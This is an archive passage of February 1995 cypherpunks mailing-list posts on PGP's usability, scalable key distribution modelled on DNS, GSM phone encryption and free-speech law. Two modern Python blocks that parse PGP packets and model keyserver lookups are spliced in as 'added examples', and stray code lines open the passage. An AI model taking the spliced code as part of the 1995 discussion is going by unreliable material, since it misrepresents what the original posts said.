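    print(chain_to_trusted(ALICE, {CAROL.key_id}, SHARDED.by_key_id))
    print(chain_to_trusted(ALICE, {CAROL.key_id}, SITES.by_key_id))
```
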




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 10 Feb 95 13:59:19 PST
To: ethridge@netcom.com (Allen B. Ethridge) (Allen B. Ethridge)
Subject: Re: The drumbeat against anonymity (Cellphone security?)
In-Reply-To: <ab5f548601021004d020@DialupEudora>
Message-ID: <199502102157.QAA20682@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


I remember watching some of the hearings on the DT Bill on CSPAN and seeing
the cellular industry people note that the DT Bill would make it difficult
to implement encryption/authentication measures.

Rob

> >The phone companies that are complaining about fraud have inadequately
> >arranged for security and need to adopt a mode that fixes this. Since
> >physical money can't be fed into the slots of a handheld cell phone (or
> >at least can't then be delivered to the service owner!), the solution
> >has traditionally been an account-based payment system. (Accounts can
> >also be better protected against fraud by having PINs, etc.)
> >
> 
> The technology to reduce cellular fraud, through encryption and
> authentication, is easily implementable, but for some reason neither
> the operating companies nor the manufacturers want it.
> 
> In contrast, European cellular (GSM) products do implement
> encryption and authentication (at least as far as laws allow).
> GSM mobile phones can be equipped with a slot for a card that
> identifies the subscriber.  Billing is based on the subscriber's
> identity, not the phone's.
> 
> I'd say that the problem isn't just a lack of a proper payment
> model, but also an unwillingness to provide adequate technology
> to the problem.  Of course, the GSM approach does nothing for anonymity
> or digital cash.
> 
> allen@well.sf.ca.us          It's dangerous, child, to come to conclusions
> ethridge@netcom.com          when you don't have any facts.
> my opinions are my own       Dr. Hemlock, The Eiger Sanction
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 10 Feb 95 14:29:15 PST
To: hh@xcf.Berkeley.EDU (Eric Hollander)
Subject: Re: why pgp sucks
In-Reply-To: <9502101849.AA21833@xcf.Berkeley.EDU>
Message-ID: <199502102228.RAA21755@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> if i use a command like
> 
> 	pgp filename
> 
> it will automatically figure out the right thing to do with the file.  if
> it's encrypted, and i have the key, it will attempt to decrypt it.  if it
> contains keys, it will ask if i want to add them to my keyring.  if it's
> signed, it checks the signature.
> 
> this sucks!

From whose point of view? Remember the thread about Getting things right
v. Getting the software out?

The above way is easier for most people with little computer techie
knowledge. Requiring a whole complex set of commands would mean fewer
PGP users.

As people get used to it and learn about the issues, key management,
etc. they'll be more willing to use a more advanced version of PGP...
at the very least, they'll eventually RTFM and realize that you actually
have more control of what it can do...

Rob

> if i'm trying to write a program to automatically process incoming mail (for
> instance, to see if it's encrypted with a specific key), i certainly don't
> want to have the possibility of people being able to add garbage to my
> keyring just by mailing it to me.

Have your program check what's in the mail before doing anything with it...?
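
One way to do the check suggested above, and to use the ASCII armor header as Derek describes, shown as an added example (not part of any post and not PGP's own code): it reads the armor label and the top-level PGP 2.x packet headers of a mail body without invoking pgp or touching a keyring. The function names and sample key IDs are constructed, and the sample armor omits the checksum line.

```python
import base64
import re

# PGP 2.x packet types (bits 5-2 of the first byte of each packet).
PACKET_NAMES = {1: "public-key encrypted session key", 2: "signature",
                5: "secret key", 6: "public key", 8: "compressed data",
                9: "conventionally encrypted data", 11: "literal data",
                12: "keyring trust", 13: "user ID"}
KEY_MATERIAL = {5, 6}

ARMOR_RE = re.compile(
    r"^-----BEGIN PGP ([A-Z ]+)-----\r?\n(.*?)^-----END PGP \1-----",
    re.S | re.M)


def dearmor(body):
    """Decode one armor body, skipping header lines and the '=' checksum."""
    lines = [ln.strip() for ln in body.splitlines()]
    data = [ln for ln in lines
            if ln and ":" not in ln and not ln.startswith("=")]
    return base64.b64decode("".join(data), validate=True)


def packets(raw):
    """Yield (type, body) for each top-level old-format packet."""
    pos = 0
    while pos < len(raw):
        ctb = raw[pos]
        if not ctb & 0x80 or ctb & 0x40:
            raise ValueError("not a PGP 2.x packet header")
        ptype, len_type = (ctb >> 2) & 0x0F, ctb & 0x03
        if len_type == 3:               # indeterminate length: rest of data
            yield ptype, raw[pos + 1:]
            return
        n = (1, 2, 4)[len_type]
        start = pos + 1 + n
        end = start + int.from_bytes(raw[pos + 1:start], "big")
        if end > len(raw):
            raise ValueError("truncated packet")
        yield ptype, raw[start:end]
        pos = end


def describe(text):
    """Report every armor block in a mail body; no keyring is consulted."""
    reports = []
    for label, body in ARMOR_RE.findall(text):
        rep = {"armor": label, "types": [], "recipients": [],
               "signers": [], "error": None}
        try:
            for ptype, pbody in packets(dearmor(body)):
                rep["types"].append(ptype)
                if ptype == 1 and len(pbody) >= 9:      # version, key ID
                    rep["recipients"].append(pbody[1:9].hex().upper())
                elif ptype == 2 and len(pbody) >= 15:   # key ID at offset 7
                    rep["signers"].append(pbody[7:15].hex().upper())
        except ValueError as exc:       # includes base64 decoding errors
            rep["error"] = str(exc)
        reports.append(rep)
    return reports


def safe_to_autoprocess(text):
    """True only if armor is present, parses, and carries no key packets."""
    reps = describe(text)
    return bool(reps) and all(
        r["error"] is None and not KEY_MATERIAL & set(r["types"]) for r in reps)


def is_encrypted_to(text, key_id):
    """Match a displayed key ID (e.g. '0x89ABCDEF') against recipient IDs."""
    want = key_id.upper()
    want = want[2:] if want.startswith("0X") else want
    return any(k.endswith(want) for r in describe(text) for k in r["recipients"])


# --- constructed sample input (not real PGP output) ---
def make_packet(ptype, body):
    return bytes([0x80 | (ptype << 2), len(body)]) + body   # 1-byte length


def make_armor(label, raw):
    b64 = base64.b64encode(raw).decode()
    return (f"-----BEGIN PGP {label}-----\nVersion: 2.6.2\n\n{b64}\n"
            f"-----END PGP {label}-----\n")


KEY_A = bytes.fromhex("0123456789ABCDEF")
KEY_B = bytes.fromhex("FEDCBA9876543210")
SAMPLE_ENCRYPTED_MAIL = "Subject: test\n\n" + make_armor("MESSAGE", b"".join([
    make_packet(1, b"\x02" + KEY_A + b"\x01\x00\x08\xff"),
    make_packet(1, b"\x02" + KEY_B + b"\x01\x00\x08\xff"),
    make_packet(9, bytes(16))]))
SAMPLE_KEY_MAIL = "Subject: hi\n\n" + make_armor(
    "PUBLIC KEY BLOCK", make_packet(6, b"\x02" + bytes(7) + b"\x00\x08\xff\x00\x08\x11"))
```

Only top-level packets are visible this way: anything wrapped inside an encrypted or compressed packet cannot be classified without decrypting it, so a mail filter should still call pgp in a restricted mode afterwards.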







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 10 Feb 95 14:31:27 PST
To: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502102047.AA25106@hibbs.vcu.edu>
Message-ID: <199502102233.RAA02974@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>Doesn't having some kind of central record of keys go against
>the principle of PGP?  

The only "principle" of which I'm aware (and particularly interested
in supporting) is that of having widely fielded, useful and strong
privacy and authentication tools that work properly and transparently.
That means, among a great many other things, flexible protocols
and tools that support remote key distribution services.

As much as people want to believe that privacy can be reduced to
some kind of romantic struggle between the evil forces of Centralization
(PEM?) and the civilizing forces of Anarchy (PGP?), the world most
of us live in is a lot more complex than that.

More seriously, the problem that Perry brought up is that it's hard
to deploy any kind of scaleable key distribution infrastructure
that works with PGP (as it currently exists - and yes, I realize
there are work-arounds for some specific situations).  That, as well
as other shortcomings (like its fixed trust/certification model)
that work against its serious use, make it doubtful that PGP 2.x
has much long-term future as anything other than a plaything for
nerds like us.  Hopefully, PGP and other good tools will evolve to
work well on a larger scale before Microsoft has a chance to give
everyone what _it_ thinks the world needs.

(I'm not trying to attack anyone here, by the way - part of the
problem is that we're just now learning what the privacy problems
of the real world even _are_.  Experimental tools like PGP are
important as much for providing experience and exposing problems
and limitations as they are for their immediate function.  Indeed,
the fact that PGP and PEM are as useful as they are may actually
work _against_ the spread of really large-scale crypto tools; the
people who they are aimed at stay happy while the rest of the world
never finds out what it's missing.)

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 10 Feb 95 14:51:36 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: law vs technology
In-Reply-To: <199502102133.AA16472@mail.eskimo.com>
Message-ID: <199502102253.RAA10658@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:
> If you have a certain amount of time to spend on
> advancing the cause of greater personal privacy (or freedom, or
> cryptoanarchy, or whatever), can you do it better by using the
> time to learn about cryptography and develop the tools to
> protect privacy, or by convincing your government not to invade
> your privacy?  I argue that since there are many more people
> doing the former (EFF, CPSR, etc) than latter, that you'd be
> more effective if you spent the time on the former.

[Presumably you meant, "many more people doing the *latter* than *former*"]

Speaking strictly for myself, I agree. I'm relatively well-positioned to
design and produce privacy- and security-preserving protocols and programs.
OTOH, while I find politics absorbing, I don't have any special expertise or
influence. Once the legal scholars start to debate legislation, I step out
of the way.

There is, however, an awfully wide spectrum of interests and abilities 
among the subscribers to this list, from what I can tell. Plenty of people
here lack some of the requisite technical skills, but can offer significant
assistance in other ways. So I think your point applies to some people here,
but not everyone. 

I'm reminded of the controversy over the essential identity of cypherpunks.
There was interminable wrangling over who (if anyone) "owned" the list, 
whether the list and Cypherpunks were identical, etc. AFAI can tell, the list
comprises many of both run-of-the-mill privacy/security advocates (whatever 
that means) and Cypherpunks according to strict definitions as written by Tim 
and others.

As a separate issue, there are quite a few vocal opponents of groups such as
EFF on the list. I've no idea whether there's a silent majority ;) of lurkers
who fully support EFF et al., but I suspect a sizable chunk of the list
population disagrees that there are many people really fighting invasive govt.
action.

-L. Futplex McCarthy [seeking summer work, with a background in theoretical
                      computer science; private email inquiries welcomed]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 10 Feb 95 18:08:13 PST
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: why pgp sucks
In-Reply-To: <9502102110.AA07984@josquin.media.mit.edu>
Message-ID: <Pine.3.89.9502101709.A4566-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Feb 1995, Derek Atkins wrote:
> The point is to have a centralized, distributed key distribution
> mechanism, similar in concept to the PGP Public Keyservers, but which
> scale much much better.

We already have a centralized, for profit, key distribution system.

http://ww.four11.com/InfoServices.html


If they make money off it, there will be more of them, they
will provide better service, and it will in due course
become a distributed key distribution system.

Digression:

I notice that it is possible to have a thread titled 
"Why PGP sucks" without Holy Warriors leaping into 
the fray.

This is a marked contrast with certain other topics. 

Possibly the level of heat is inversely proportional
to the level of knowledge.  (I.e. it is safe to have
such a thread title because in this list we have
many people with considerable knowledge of several
different crypto systems, and who have spent 
considerable thought on the various possibilities.)


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Harvey <warrior@infinet.com>
Date: Fri, 10 Feb 95 15:22:12 PST
To: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Subject: Re: Laws, Feds, & the Internet
In-Reply-To: <199502102211.OAA22129@mail.igc.apc.org>
Message-ID: <Pine.3.89.9502101831.B22980-0100000@rigel>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Feb 1995, Richard F. Dutcher wrote:

> 
> The following was in today's San Francisco Chronicle.  BTW, quoting 
> the entire article as I have done is probably a violation of "fair 
> use" - but de minimis ...
> 
> All under *current* law, folks.
> 
> [hmmm -- encryption doesn't do much for exhibitionists and 
> braggarts, does it?  ;-]
> 
> ==============================
[Article Deleted for the sake of Brevity]

Now mind you, this kind of writing is demented, however, what ever
happened to fiction, free speech and such.  At this rate, Steven Spielberg
should be in jail as well.  I thought you had to prove intent, the saying
something or writing it is not bad as long as you didn't have the intent
or present capability to carry out such.  BTW, I like all of Steven
Spielberg's writings and movies, and now HB830 from Oregon rears its head
and fangs.  Did this guy intend to threaten or was it fiction?  How would
they even know? 

Next thing you know they will limit all free speech.

Bummer.

dh
___
            /\  PGP the Cutting Edge of Privacy.
/vvvvvvvvvvvv \-----------------------------------\
| WARRIOR   (  |     PGP Key Id 0XF4D9F5C5          > Magnus Frater Videt Tu
`^^^^^^^^^^^^ /===================================/
            \/  Finger for PGP 2.6.2 public Key.

      PGP Fingerprint 76 6F 4B 56 B1 AC 05 FE  BE 39 9D CC 18 E4 F6 68
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M. Harvey                                       warrior@infinet.com|
| PO Box 151311              	            dharvey@freenet.columbus.oh.us|
| Columbus, OH 43215-8311    	               fm063@cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 10 Feb 95 06:56:02 PST
To: cypherpunks@toad.com
Subject: GSM and cellular crypto
Message-ID: <gate.og1B1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Richard Parrett (?) wrote:
> GSM uses less than strong encryption, by the way. I forget the
> technical details, but it is of the level that governments can
> fairly readily crack, but beyond the reach of most private
> organisations. (So no more 'Squidgy-gate'). It would, however,
> be quite feasible to add additional second stage encryption
> to phones (since the dataflow is digital point-point). I wonder
> if Nokia, a Finnish company well outside the scope of COCOM,
> might offer a feature like this.

All operators of cellular networks in India are to use GSM, and Nokia has
been running an enormous ad campaign, it is very likely to be the market
leader in instruments. I don't know about any encryption provided, though.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 10 Feb 95 06:54:56 PST
To: cypherpunks@toad.com
Subject: Indian Supreme Court ends state control of the airwaves
Message-ID: <gate.J12B1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



The Indian Supreme Court yesterday (9th February, 1995) directed the 
government to create an independent autonomous regulatory body for the 
airwaves (like the US FCC) and end the state monopoly on broadcasting and 
satellite uplinks.

The judges took an interesting position that the "GREATER IMPACT" OF 
ELECTRONIC MEDIA and its "wider range of circulation of information" as 
opposed to the press, CANNOT BE USED TO RESTRICT or deny THE RIGHT TO FREE 
EXPRESSION. This may have important consequences, for all over the world, 
including in the US and India, the electronic media is denied freedoms 
allowed to the press with the excuse that it's somehow different.

The three-judge bench, comprising Justices PB Sawant, S Mohan and BP Jeevan
Reddy, made the ruling after a government appeal against a previous ruling 
by the Calcutta High Court. The Calcutta High Court had earlier upheld the 
right to telecast as fundamental, which would theoretically prevent any 
regulation or censorship whatsoever. The consensual Supreme Court judgement,
while denying the government's power of monopoly, upheld its right to subject 
the electronic media to regulation and censorship. 

However, Justice Reddy, in his separate ruling did not mention censorship.
He pointed out that the century-old Indian Telegraph Act of 1885, which has
been ingeniously extrapolated to support the government's monopoly over 
electronic media and right to 'licence' data networks, was "wholly inadequate
and unsuited for" electronic media, and said that Parliament should enact
new laws to govern such media.

Unfortunately the Supreme Court has no powers to legislate, and new laws have
a habit (as seen with the Digital Telephony Bill in the US) of increasing,
rather than decreasing, government authority. The explicit statement that
the electronic media should not be more restricted than the press will, 
hopefully, prevent that.

The legal battle started with the Doordarshan, the state TV monopoly, 
objecting to the Cricket Association of Bengal's contract with Trans World
International granting the latter worldwide broadcasting rights to a cricket
tournament. Doordarshan used the 1885 Act to prevent TWI from uplinking to
satellite, till the courts intervened.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Fri, 10 Feb 95 20:02:39 PST
To: "Richard F. Dutcher" <warrior@infinet.com>
Subject: Re: Laws, Feds, & the Internet
Message-ID: <199502110403.UAA12629@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Fri, 10 Feb 1995 18:17:55 -0500 (EST)
> From:          Dave Harvey <warrior@infinet.com>
> Subject:       Re: Laws, Feds, & the Internet
> To:            "Richard F. Dutcher" <rfdutcher@igc.apc.org>
> Cc:            cypherpunks@toad.com

> On Fri, 10 Feb 1995, Richard F. Dutcher wrote:
> 
> > 
> > The following was in today's San Francisco Chronicle.  BTW, quoting 
> > the entire article as I have done is probably a violation of "fair 
> > use" - but de minimis ...
> > 
> > All under *current* law, folks.
> > 
> > [hmmm -- encryption doesn't do much for exhibitionists and 
> > braggarts, does it?  ;-]
> > 
> > ==============================
> [Article Deleted for the sake of Brevity]
> 

And David Harvey wrote:

> Now mind you, this kind of writing is demented, however, what ever
> happened to fiction, free speech and such.  At this rate, Steven Spielberg
> should be in jail as well.  I thought you had to prove intent, the saying
> something or writing it is not bad as long as you didn't have the intent
> or present capability to carry out such.  BTW, I like all of Steven
> Spielberg's writings and movies, and now HB830 from Oregon rears its head
> and fangs.  Did this guy intend to threaten or was it fiction?  How would
> they even know? 
> 
> Next thing you know they will limit all free speech.
> 

They *do* have to prove intent -- as to how, that's what juries are 
for.  BTW, he used her real name in the post, with no disclaimers 
about fiction.  From what I have heard, if he had said the same thing 
in her presence, he could have been arrested for assault.

So is saying something that would be actionable in a public space
also actionable in a public cyberspace?  I dunno, and neither does
anyone else.  But it's a well-established principle that a threat is 
a shout of "Fire!" in a crowded theater.

The "Law" is very conservative.  Not like Newt the Grinch, but like 
the Catholic Church -- make the least change necessary to accommodate 
the pressures.  If you've got laws to cover telephones and cybercomm 
looks like telephones, get out the shoehorn.

"Free" speech has always been a balancing act.  The founders
certainly didn't intend to provide "free" speech for blacks and
women.  Our current case law structure is, in large part, the results
of the ACLU's 80-year struggle to prevent a repetition of the
wholesale imprisonment of dissidents during WWI.  Previously, people
were *commonly* tossed in local hoosegows [sp?] at the whim of the
local authorities for speaking out on anything [Quakers, Methodists,
Baptists, temperance, free love, abolition, suffrage, pacifists, 
Romanists, Masons, anti-masons, anarchists, populists, free silver, 
etc. ad nauseam].

"They" have never liked "free" speech ... :-(

Wei Dai has the right idea -- be a specialist, support other 
specialists.  [But keep those cards and letters coming ... ;-]



===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Network Security Observations <NSO@delphi.com>
Date: Fri, 10 Feb 95 17:02:53 PST
To: cypherpunks@toad.com
Subject: Re: So, what's it all about?
Message-ID: <01HMWAETLTZ29C1MQQ@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


In response to:

> In article <199502100151.RAA25844@sleepy.retix.com>, you wrote:
> > 
> > >   I went to a UNIX trade show yesterday, and the main speaker was a 
> > >   security type. He talked about "the cypherpunks" among other things.
> > >   He said you are really scary and dangerous and ...
> > >   But of course he had to also project this address (cypherpunks@toad.com)
> > >   on the screen.
> > can't imagine he is much of a security stud if he is that deluded.
> > what was his name?
> Lance or Vance something.  Rottweiler, maybe?

Can anybody tell me who this ignorant twit might be?
A correct name and an email address would help to educate him a bit.

Bertil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 10 Feb 95 17:11:41 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: why pgp sucks
In-Reply-To: <199502110029.QAA21514@jobe.shell.portal.com>
Message-ID: <199502110114.UAA07325@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>Matt Blaze <mab@crypto.com> writes:
>>More seriously, the problem that Perry brought up is that it's hard
>>to deploy any kind of scaleable key distribution infrastructure
>>that works with PGP (as it currently exists - and yes, I realize
>>there are work-arounds for some specific situations).
>
>Could you have a distributed database where you lookup by key ID and get
>a key?  Or is there a constraint that the key distribution infrastructure has
>to be part of the DNS?
>
>I could see a set of key servers where one deals with all keys that start
>with 0x00, the next has all keys which start with 0x01, etc.  This makes
>it easy to know which server to go to in order to look up a given key ID.
>
>Hal

Well, you could do that, but it has the disadvantage that you can't
or control what server a particular key would end up on.  One of the
nice things about DNS-like systems is that a domain is responsible for
providing the resources to provide lookups within it.  If I add a machine
to crypto.com, I add it to the crypto.com name server (plus the secondary
servers, but that's a detail that gets handled automatically).
Everyone knows to come here if they want to resolve a crypto.com name.

In the case of PGP key IDs, you could create an artificial hierarchy
of numbers for the purpose of offloading work among several servers,
but that doesn't solve the hard problem, which is letting _me_ (or my
designee) control (and be responsible for) the distribution of keys in
_my_ domain.  (When someone generates a new key it could end up anywhere
in the kind of hierarchy you described).

I don't think it's clear yet, by the way, that domain names are
the right model for personal key distribution (in particular, it
assumes that keys are being distributed on-line and deals only
awkwardly with semi- off-line clients, as anyone who travels with
a sometimes-networked laptop knows.  It also assumes that the
distribution hierarchy can be mapped atop the lookup keys namespace,
which makes it hard to use for anything that isn't hierarchically
formed).  It's probably one of the important options, though, since
it scales so well and has a successfully fielded history in DNS.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 19:10:18 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: why pgp sucks
In-Reply-To: <199502110029.QAA21514@jobe.shell.portal.com>
Message-ID: <9502110307.AA16138@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal says:
> Matt Blaze <mab@crypto.com> writes:
> >More seriously, the problem that Perry brought up is that it's hard
> >to deploy any kind of scaleable key distribution infrastructure
> >that works with PGP (as it currently exists - and yes, I realize
> >there are work-arounds for some specific situations).
> 
> Could you have a distributed database where you lookup by key ID and get
> a key?  Or is there a constraint that the key distribution infrastructure has
> to be part of the DNS?
> 
> I could see a set of key servers where one deals with all keys that start
> with 0x00, the next has all keys which start with 0x01, etc.  This makes
> it easy to know which server to go to in order to look up a given key ID.

This will not work, Hal, because it would mean that administrative
control over keys would have to be held by people far removed
organizationally and spatially from those who own them. Things work
much better when the administrators and users are close
together. Furthermore, the DNS style solution scales -- it
automatically acquires servers to meet demand as the space expands,
unlike a pseudo-distributed system such as the one you
propose. Furthermore, DNS is one of the few really large scale
distributed databases that has been well proven, and piggybacking off
the technology has real advantages.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 19:16:52 PST
To: Matt Blaze <mab@crypto.com>
Subject: Re: why pgp sucks
In-Reply-To: <199502110114.UAA07325@crypto.com>
Message-ID: <9502110316.AA29939@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze:
> I don't think it's clear yet, by the way, that domain names are
> the right model for personal key distribution (in particular, it
> assumes that keys are being distributed on-line and deals only
> awkwardly with semi- off-line clients, as anyone who travels with
> a sometimes-networked laptop knows.  It also assumes that the
> distribution hierarchy can be mapped atop the lookup keys namespace,
> which makes it hard to use for anything that isn't hierarchically
> formed).  It's probably one of the important options, though, since
> it scales so well and has a successfully fielded history in DNS.

The idea I've had, and have floated to a few people, is not to
base a distributed keyserver on DNS, but to use DNS as a model
for a distributed key database.  

Hal, yes, you could have a keyID->userID mapping, but that doesn't
scale well.  Let me give you a concrete example (using DNS): I want
the host information for TOXICWASTE.MIT.EDU.  From the root servers I
get to EDU->MIT->TOXICWASTE, and find its IP address (18.85.0.40).
This would be like asking for a key by UserID (warlord@MIT.EDU would
go to the MIT.EDU keyserver).  Now, let's work in reverse, you have
18.85.0.40 and want to get the hostinfo.  In DNS there is a 1-to-1
mapping of Domain to Network.  You _know_ that any machine that is in
18.* will be at MIT, so again you can go to the MIT nameserver for
help.

This doesn't work with PGP KeyID, since the keyID is a random string
of bits.  As a result, you have no way to know that keyID 0xC1B06AF1
should be obtained on the MIT keyserver.  This is the major problem
that Perry is trying to address.  I just don't know of a good way of
doing this, other than maintaining a keyID->userID mapping table
somewhere, but that can become a HUGE flat lookup table!

James said:
> We already have a centralized, for profit, key distribution system.
> 
> http://ww.four11.com/InfoServices.html
> 
> If they make money off it, there will be more of them, they
> will provide better service, and it will in due course
> become a distributed key distribution system.

No offense, James, but this needs to be a free infrastructure.  When
you get your shell account/IP address/PPP drop/etc., you should also
automagically be allocated space in a keyserver.  It shouldn't cost
you anything to be put in it (just like it doesn't cost you anything
to be put in the Telephone White Pages).

The keyservers have to be distributed so that there is a single method
for everyone in the world to connect to the white-page server of their
choice.  I'm sorry, but the WWW is not it.  The WWW does not scale,
and personally if I had to pay to be put on your server, I would
ignore it; I'm perfectly happy using the Public Keyservers.

Just as sites currently provide DNS service for names, they will, in
some time, provide KeyService as well.  It's just a matter of time.

As for the "centralized" part...  I think the distributed part is much
more important.  The public keyserver keyrings are currently over 3MB
and growing.  We need to be able to split that keyring across multiple
servers and have requests go to the appropriate locations.  Yes, there
will be a centralized authority delegator, but the keys themselves, as
well as the means to obtain them, will be distributed.

Enjoy!

-derek
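
[Added example, not part of the original messages: a small Python model of the two lookup schemes argued over in this thread, Hal's key-ID-prefix servers and the DNS-style per-domain servers that Matt, Perry and Derek describe. Only warlord@MIT.EDU and key ID 0xC1B06AF1 come from the thread; every other user ID, key ID and function name is constructed for illustration.]

```python
# Constructed sample directory. Only warlord@MIT.EDU / 0xC1B06AF1 appears in
# the thread; all other entries are made up for illustration.
KEYS = {
    "warlord@MIT.EDU":  0xC1B06AF1,
    "alice@mit.edu":    0x00D41A7E,
    "bob@mit.edu":      0x01F3309B,
    "carol@crypto.com": 0x00917C22,
    "dave@crypto.com":  0xC15E0D44,
    "erin@imsi.com":    0x01AA6F10,
}


def domain_of(user_id):
    return user_id.rsplit("@", 1)[1].lower()


def prefix_shards(keys):
    """Hal's proposal: the server is chosen by the first byte of the key ID."""
    shards = {}
    for user_id, key_id in keys.items():
        shards.setdefault(key_id >> 24, {})[key_id] = user_id.lower()
    return shards


def domain_servers(keys):
    """DNS-style: each domain runs the server for its own users' keys."""
    servers = {}
    for user_id, key_id in keys.items():
        servers.setdefault(domain_of(user_id), {})[user_id.lower()] = key_id
    return servers


def delegation_path(user_id):
    """Zones consulted from the root down, e.g. ['edu', 'mit.edu']."""
    labels = domain_of(user_id).split(".")
    return [".".join(labels[i:]) for i in range(len(labels) - 1, -1, -1)]


def lookup_by_user_id(servers, user_id):
    """Follow the delegation to the one server responsible for the domain."""
    path = delegation_path(user_id)
    return servers.get(path[-1], {}).get(user_id.lower()), path


def shards_holding_domain(shards, domain):
    """Prefix shards that a domain's administrator would depend on but not run."""
    return sorted(shard for shard, entries in shards.items()
                  if any(domain_of(u) == domain for u in entries.values()))


def build_flat_index(keys):
    """The keyID -> domain table Derek mentions: one row per key, world-wide."""
    return {key_id: domain_of(user_id) for user_id, key_id in keys.items()}


def lookup_by_key_id(servers, key_id, flat_index=None):
    """A key ID names no domain: use the flat table, or ask every server.

    Returns (user_id, number_of_domain_servers_asked).
    """
    if flat_index is not None:
        domain = flat_index.get(key_id)
        candidates = [domain] if domain else []
    else:
        candidates = sorted(servers)
    asked = 0
    for domain in candidates:
        asked += 1
        for user_id, kid in servers[domain].items():
            if kid == key_id:
                return user_id, asked
    return None, asked


if __name__ == "__main__":
    shards, servers = prefix_shards(KEYS), domain_servers(KEYS)
    print("by user ID:", lookup_by_user_id(servers, "warlord@MIT.EDU"))
    print("mit.edu keys sit on prefix shards:",
          [hex(s) for s in shards_holding_domain(shards, "mit.edu")])
    print("by key ID, no index:", lookup_by_key_id(servers, 0xC1B06AF1))
    index = build_flat_index(KEYS)
    print("by key ID, flat index of", len(index), "rows:",
          lookup_by_key_id(servers, 0xC1B06AF1, index))
```
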




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 19:21:16 PST
To: perry@imsi.com
Subject: Re: why pgp sucks
In-Reply-To: <9502110307.AA16138@snark.imsi.com>
Message-ID: <9502110321.AA29986@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


The only problem with piggybacking off the current DNS implementation
is that DNS was designed for SMALL pieces of data (read: hostnames and
IP addresses).  PGP keys are HUGE pieces of data, in respect, and DNS
just won't handle the sizes.  For example, my PGP key is about 8k of
data (approximately).  DNS would never be able to handle that!

If it's bigger than a single UDP packet DNS has trouble.

No, while DNS is a perfect model for a distributed keyserver,
it is by no means the implementation infrastructure that we want
to use.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 10 Feb 95 21:21:24 PST
To: owner-cypherpunks@toad.com
